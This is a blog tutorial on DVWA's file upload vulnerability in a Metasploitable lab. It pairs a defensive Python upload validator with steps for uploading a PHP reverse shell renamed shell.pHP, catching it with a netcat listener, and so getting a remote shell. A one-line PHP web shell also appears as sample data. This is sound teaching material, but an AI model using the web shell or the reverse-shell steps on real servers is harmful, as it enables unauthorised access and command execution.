
FILE UPLOAD VULNERABILITY IN DVWA

by Anveeksh M Rao | TECH WITH ANVEEKSH | Cyber Security

What is a File Upload Vulnerability in DVWA

A file upload vulnerability exists when a web server lets users upload files to its filesystem without sufficiently validating their name, type, contents, or size. Uploading itself is just the transfer of a file from one computer to another, usually a larger one: from the network user's point of view, to upload a file is to send it to a computer that is set up to receive it. The problem begins when the receiving server stores whatever it is sent, under the name it was given, in a location the web server will execute.
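To make the four checks named in that definition (name, type, contents, size) concrete, here is a small validator written for this article. It is not DVWA's own code; it contrasts a DVWA-Low style handler that trusts the client with a hardened one, run offline over constructed sample uploads (including a `shell.pHP` like the one used later on this page). The storage directory `/var/uploads`, the 100 000-byte cap and the sample bodies are assumptions chosen for the example.

```python
"""Naive vs. hardened handling of an uploaded file (added example; not DVWA's
own code). The sample uploads and image magic bytes below are constructed."""
import os
import secrets

# Leading bytes of the image formats we are willing to accept.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
}
# Client extension -> canonical format name.
ALLOWED_EXT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}
MAX_BYTES = 100_000                 # arbitrary cap chosen for this example
UPLOAD_DIR = "/var/uploads"         # assumed directory OUTSIDE the web root


def naive_save(filename: str, data: bytes) -> str:
    """What a DVWA-Low style handler does: keep the client's file name and
    place it under the web root, so a .pHP file becomes a web-reachable script."""
    return "hackable/uploads/" + filename


class RejectedUpload(ValueError):
    """Raised with a short reason when an upload fails validation."""


def hardened_save(filename: str, data: bytes, content_type: str) -> str:
    """Check size, name, declared type and contents, then store the file
    under a server-chosen name. Returns the storage path."""
    # Size: reject empty and oversized bodies before doing anything else.
    if not data or len(data) > MAX_BYTES:
        raise RejectedUpload("size")

    # Name: drop any directory part (neutralises ../ traversal), take only the
    # LAST extension and compare it lower-cased. Apache matches extensions
    # case-insensitively, so 'shell.pHP' is a PHP script to the server and
    # must be judged as one here too.
    base = os.path.basename(filename.replace("\\", "/"))
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem:
        raise RejectedUpload("no extension")
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        raise RejectedUpload(f"extension .{ext}")
    kind = ALLOWED_EXT[ext]

    # Declared type: set by the client, so it may only narrow the decision
    # (DVWA's Medium level relies mainly on it, which is why it is bypassable).
    if content_type != f"image/{kind}":
        raise RejectedUpload("content-type mismatch")

    # Contents: the bytes must actually begin like that image format. This
    # catches 'shell.php.jpg' containing PHP; a PNG with PHP appended would
    # pass, which is why the storage step below never lets it execute.
    if not data.startswith(MAGIC[kind]):
        raise RejectedUpload("magic bytes")

    # Storage: random name, server-chosen extension, outside the web root.
    return f"{UPLOAD_DIR}/{secrets.token_hex(16)}.{kind}"


# Constructed sample uploads: (client file name, body, declared Content-Type).
SAMPLES = [
    ("shell.pHP", b"<?php system($_GET['cmd']); ?>", "application/x-php"),
    ("shell.php.jpg", b"<?php system($_GET['cmd']); ?>", "image/jpeg"),
    ("cat.png", MAGIC["png"] + b"\x00" * 32, "image/png"),
    ("../../evil.png", MAGIC["png"] + b"\x00" * 32, "image/png"),
    ("huge.png", MAGIC["png"] + b"\x00" * MAX_BYTES, "image/png"),
]


def run_demo() -> dict:
    """Run every sample through hardened_save; map file name -> verdict."""
    verdicts = {}
    for name, body, ctype in SAMPLES:
        try:
            hardened_save(name, body, ctype)
            verdicts[name] = "stored"
        except RejectedUpload as why:
            verdicts[name] = f"rejected: {why}"
    return verdicts


if __name__ == "__main__":
    print("naive :", naive_save("shell.pHP", b"..."))
    for name, verdict in run_demo().items():
        print(f"{name:16} -> {verdict}")
```

The order of the checks matters less than the last step: even if every filter is fooled by a polyglot image, a file stored under a random name with a fixed image extension in a directory the web server never executes from cannot become the reverse shell this page goes on to demonstrate.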


Let's Study a Practical Example of FILE UPLOAD


Step 1: - Install Metasploitable (the intentionally vulnerable VM that ships DVWA, not the Metasploit framework) in VMware or VirtualBox and set it up


FIG 1

Step 2: - Boot Metasploitable and log in with user msfadmin and password msfadmin. Run ip addr (or ifconfig) and note the IP address of eth0


FIG 2

Step 3 : - Open a terminal on your Kali Linux machine and run ping <metasploitable ip address>. A reply confirms the target is reachable from Kali


FIG 3

Step 4 :- Open Firefox, browse to http://10.0.2.18/dvwa/ and click DVWA


FIG 4

Step 5 :- Open DVWA Security, choose Low / Medium / High and submit

On High the filter only accepts image files, so use Low for this walkthrough


FIG 5

Step 6 :- Click Upload. Now let's create the PHP file to upload


FIG 6

Step 7:- Open the file manager and browse to /usr/share/webshells/php/php-reverse-shell.php. Edit it so that $ip is the IP address of your Kali machine (the box where netcat will listen, not the Metasploitable IP, because a reverse shell connects back to the attacker) and $port is 4444 (fig 7, 8), then save it to the Desktop


FIG 7


FIG 8

Step 8 :- Save the edited php-reverse-shell.php as shell.pHP (a mixed-case extension, which Apache still treats as PHP). Then open a terminal and start the listener with nc -lvnp 4444, where nc is netcat and 4444 is the port set in the shell


FIG 9

Step 9 :- In DVWA click the Upload option and upload the pHP file. DVWA reports that it was uploaded successfully and shows where it was stored; copy that path, hackable/uploads/shell.php


FIG 10

Step 10 :- Paste the copied path into the URL bar, changing http://10.0.2.18/dvwa/vulnerabilities/upload/# to http://10.0.2.18/dvwa/hackable/uploads/shell.php (refer to fig 11, 12). Requesting the file makes the server execute it


FIG 11


FIG 12

Step 11 :- The browser only shows a warning page (or keeps loading), but in the netcat terminal you now have a shell on the target machine: you can read and modify files and run commands with the web server's privileges (fig 13, 14)


FIG 13


FIG 14


Conclusion

This only works on DVWA, a deliberately vulnerable lab application. Never upload files like this to any real website: it is unauthorised access, and you may be arrested under Section 66 of the IT Act. BE AWARE


This is how an unrestricted file upload gives you access to the server. I hope this article helped you
